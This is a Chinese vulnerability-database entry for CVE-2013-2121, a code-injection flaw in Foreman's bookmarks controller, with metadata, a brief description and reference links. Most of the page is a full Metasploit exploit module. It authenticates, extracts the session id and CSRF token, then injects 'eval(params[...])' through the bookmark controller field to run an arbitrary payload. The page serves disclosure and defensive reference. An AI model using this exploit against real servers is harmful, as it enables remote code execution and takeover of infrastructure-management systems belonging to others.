Foreman ‘bookmarks_controller.rb’远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121773 漏洞类型 代码注入
发布时间 2013-07-23 更新时间 2013-07-23
CVE编号 CVE-2013-2121 CNNVD-ID CNNVD-201307-152
漏洞平台 Linux CVSS评分 6.0
|漏洞来源
https://www.exploit-db.com/exploits/27045
https://www.securityfocus.com/bid/60833
https://cxsecurity.com/issue/WLB-2013070174
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201307-152
|漏洞详情
Foreman是一套用于物理和虚拟服务器中的生命周期管理工具。该工具提供服务开通、配置管理以及报告状态等功能。Foreman1.2.0:rc1及之前的版本中的Bookmarks控制器中的create方法中存在Eval注入漏洞。远程经过授权的攻击者可通过控制器名称属性利用该漏洞以特权创建书签执行任意代码。
|漏洞EXP
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name'           => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',
      'Description'    => %q{
          This module exploits a code injection vulnerability in the 'create'
        action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite
        (Foreman 1.2.0-RC1 and earlier).
      },
      'Author'         => 'Ramon de C Valle',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-2121'],
          ['CWE', '95'],
          ['OSVDB', '94671'],
          ['BID', '60833'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],
          ['URL', 'http://projects.theforeman.org/issues/2631']
        ],
      'Platform'       => 'ruby',
      'Arch'           => ARCH_RUBY,
      'Privileged'     => false,
      'Targets'        =>
        [
          ['Automatic', {}]
        ],
      'DisclosureDate' => 'Jun 6 2013',
      'DefaultOptions' => { 'PrependFork' => true },
      'DefaultTarget' => 0
    )

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('USERNAME', [true, 'Your username', 'admin']),
        OptString.new('PASSWORD', [true, 'Your password', 'changeme']),
        OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
      ], self.class
    )
  end

  def exploit
    print_status("Logging into #{target_url}...")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'users', 'login'),
      'vars_post' => {
        'login[login]'    => datastore['USERNAME'],
        'login[password]' => datastore['PASSWORD']
      }
    )

    fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?

    if res.headers['Location'] =~ /users\/login$/
      fail_with(Exploit::Failure::NoAccess, 'Authentication failed')
    else
      session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
      fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?
    end

    print_status('Retrieving the CSRF token for this session...')
    res = send_request_cgi(
      'cookie' => "_session_id=#{session}",
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri)
    )

    fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?

    if res.headers['Location'] =~ /users\/login$/
      fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')
    else
      csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]*\/?>/i
      csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]*\/?>/i

      if csrf_param.nil? || csrf_token.nil?
        csrf_param = $1 if res.body =~ /<meta[ ]+name="csrf-param"[ ]+content="(.*)"[ ]*\/?>/i
        csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(.*)"[ ]*\/?>/i
      end

      fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?
    end

    payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)

    print_status("Sending create-bookmark request to #{target_url('bookmarks')}...")
    res = send_request_cgi(
      'cookie'    => "_session_id=#{session}",
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'bookmarks'),
      'vars_post' => {
        csrf_param             => csrf_token,
        payload_param          => payload.encoded,
        'bookmark[controller]' => "eval(params[:#{payload_param}])#",
        'bookmark[name]'       => Rex::Text.rand_text_alpha_lower(rand(9) + 3),
        'bookmark[query]'      => Rex::Text.rand_text_alpha_lower(rand(9) + 3)
      }
    )
  end

  def target_url(*args)
    (ssl ? 'https' : 'http') +
      if rport.to_i == 80 || rport.to_i == 443
        "://#{vhost}"
      else
        "://#{vhost}:#{rport}"
      end + normalize_uri(target_uri.path, *args)
  end
end
|参考资料

来源:groups.google.com
链接:https://groups.google.com/forum/#!topic/foreman-users/6WpO_3ugiXU
来源:bugzilla.redhat.com
链接:https://bugzilla.redhat.com/show_bug.cgi?id=966804
来源:EXPLOIT-DB
名称:27045
链接:http://www.exploit-db.com/exploits/27045
来源:REDHAT
名称:RHSA-2013:0995
链接:http://rhn.redhat.com/errata/RHSA-2013-0995.html
来源:projects.theforeman.org
链接:http://projects.theforeman.org/issues/2631
来源:BID
名称:60833
链接:http://www.securityfocus.com/bid/60833